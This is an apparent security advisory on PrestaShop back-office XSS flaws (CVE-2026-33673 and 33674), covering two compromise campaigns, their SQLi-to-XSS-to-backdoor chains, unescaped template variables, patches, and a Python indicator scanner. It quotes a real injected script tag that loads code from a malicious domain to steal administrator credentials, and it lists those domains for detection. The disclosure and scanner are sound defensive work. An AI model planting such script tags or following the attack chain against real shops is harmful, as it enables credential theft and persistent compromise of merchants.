PrestaShop Back Office XSS Vulnerability Fix – March 2026 – [CVE-2026-33673 (and CVE-2026-33674)]
Date: 23 March 2026
Severity: HIGH
Affected versions: All PrestaShop versions
CVE: CVE-2026-33673
Patch status: Available for PS 8.2.5 and 9.1.0
Forensic research and analysis: 202 ecommerce / Prestafence
Patch author: 202 ecommerce / Prestafence
Background
Since the first half of 2025, the PrestaShop ecosystem has been targeted by two major compromise campaigns exploiting Cross-Site Scripting (XSS) vulnerabilities in the back office.
Estimated scale: 500+ compromised PrestaShop shops
Main vector: Malicious code injection via SQLi -> XSS -> Backdoor installation
Impact: Theft of administrator credentials, installation of persistent malware
Campaign 1: softbylinux / softwarebyms
Active period: H1–H2 2025
Compromised shops: 300+ identified
Key indicator of compromise
Presence of a malicious domain in the homepage's <title> tag:
- softwarebyms[.]com
- softbylinux[.]com
Example of compromised code
<title>My title</title><p hidden>"<script defer src="https://softwarebyms.com/t2ps.js"></script><p hidden></title>
Vector of attack
- Entry point: SQL injection into the PS_SHOP_NAME variable (ps_configuration table)
- Exploitation: The injected <script> tag is not escaped in the back-office templates
- Execution: When visiting the BO login page, the script is executed (XSS)
- Impact: Exfiltration of administrator credentials to a malicious server
Campaign 2: i-bracket
Active period: Since Q4 2025 (since September)
Compromised shops: 200+ identified
Key indicator of compromise
Presence of a marker in the <meta name="description"> tag:
Pattern: [i]ps_[i]VERSION[i]NUMBER
Example of compromised code:
<meta name="description" content="Ma boutique en ligne.[i]ps_[i]1.7.8.7[i]46011">
Explanation of the marker:
- ps_: Database prefix
- 1.7.8.7: PrestaShop version
- 46011: Number of orders since 1 September 2025
Attack vector (SQLi → XSS → RCE)
- Step 1 – SQLi: SQL injection into a vulnerable third-party module
- Step 2 – XSS: Injection of JavaScript code into the ‘firstname’ field of the ‘ps_employee’ table
- Step 3 – Execution: The XSS is executed the next time an admin logs in
- Step 4 – Backdoor: Automatic and silent installation of the malicious ps_analytics_enhancer module
- Step 5 – Persistence: The module provides permanent access (backdoor) to the server
Note: this vulnerability chain particularly affects PrestaShop 1.7.x, where SQLi attacks are easily achievable and where there are numerous unescaped Smarty variables in the back office.
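To check a shop's homepage for the two indicators described above (the campaign 1 script domains in the page head and the campaign 2 [i] marker in the meta description), here is an added Python scanner. It is example code written for this article, not a tool from 202 ecommerce, Prestafence or PrestaShop, and the sample HTML it feeds itself is constructed from the snippets above rather than captured from a real shop.

```python
import re
from html.parser import HTMLParser

# Indicators of compromise listed in the advisory (written literally so they match).
MALICIOUS_DOMAINS = ("softwarebyms.com", "softbylinux.com")
# Campaign 2 marker: [i]<db prefix>[i]<PrestaShop version>[i]<order count>
MARKER_RE = re.compile(
    r"\[i\](?P<prefix>\w+)\[i\](?P<version>\d+(?:\.\d+)+)\[i\](?P<orders>\d+)"
)


class _HeadScanner(HTMLParser):
    """Collect external script sources and meta descriptions from a page."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.descriptions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "meta" and (a.get("name") or "").lower() == "description":
            self.descriptions.append(a.get("content") or "")


def _host(url):
    # Strip scheme (or protocol-relative "//") and keep only the host part.
    return re.sub(r"^(?:https?:)?//", "", url).split("/")[0].lower()


def scan_homepage(html):
    """Return campaign 1 script URLs and parsed campaign 2 markers found in html."""
    parser = _HeadScanner()
    parser.feed(html)
    findings = {"campaign1": [], "campaign2": []}
    for src in parser.script_srcs:
        h = _host(src)
        if any(h == d or h.endswith("." + d) for d in MALICIOUS_DOMAINS):
            findings["campaign1"].append(src)
    for desc in parser.descriptions:
        m = MARKER_RE.search(desc)
        if m:
            findings["campaign2"].append(
                {"prefix": m["prefix"], "version": m["version"], "orders": int(m["orders"])}
            )
    return findings


# Constructed sample reproducing both indicators from the advisory (not a real capture).
SAMPLE_HTML = (
    '<html><head><title>My title</title><p hidden>"'
    '<script defer src="https://softwarebyms.com/t2ps.js"></script><p hidden></title>'
    '<meta name="description" content="Ma boutique en ligne.[i]ps_[i]1.7.8.7[i]46011">'
    "</head><body></body></html>"
)
```

Run `scan_homepage()` on the HTML served by the shop's front page; a non-empty campaign 2 entry also tells you the attacker's recorded database prefix and order count, which helps scope the incident.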
Technical vulnerability analysis
Fundamental issue: Insufficient escaping in the back-end
All versions of PrestaShop:
- ✅ Front-end: Smarty variables are escaped by default ({$variable} becomes {$variable|escape:"html"})
- ❌ Back-office: No automatic escaping in legacy templates
Consequence: Any data stored in the database (even via SQLi) and displayed in the back-office can execute arbitrary JavaScript.
Unescaped variables exploited
Examples of vulnerable variables in legacy back-office templates:
- {$shop.name} (PS_SHOP_NAME)
- {$employee.firstname} / {$employee.lastname}
- {$quick_access.name}
- Fields in *_lang tables (product descriptions, categories, etc.)
More information on CVE-2026-33673
- GHSA-35pf-37c6-jxjv: XSS in legacy and modern templates
- Affects: all versions before 8.2.5 and 9.1.0
- Patch
- Related PrestaShop DevDoc
This patch fixes the escaping of several Smarty variables (legacy back-office templates) but also introduces the Twig raw_purified function into the PrestaShop core, which allows escaping to be disabled (as with raw) whilst passing the variable’s content through HTML Purifier for sanitisation.
This helps prevent XSS exploitation chains that use the modern translation system stored in the database. It is therefore important to apply all the fixes in this patch.
More information on CVE-2026-33674
- GHSA-283w-xf3q-788: Back-office validation error
- Affects: all versions before 8.2.5 and 9.1.0
- Patch
This patch fixes form validation in the back office to prevent cross-site scripting (XSS) attacks. The isCleanHTML method has been updated to include new restricted parameters.
Resources and contacts
Official PrestaShop documentation
Tools and services
- PrestaFence : WAF / 2FA / CSP
- Emergency contacts: website hacked? contact [@] prestafence.com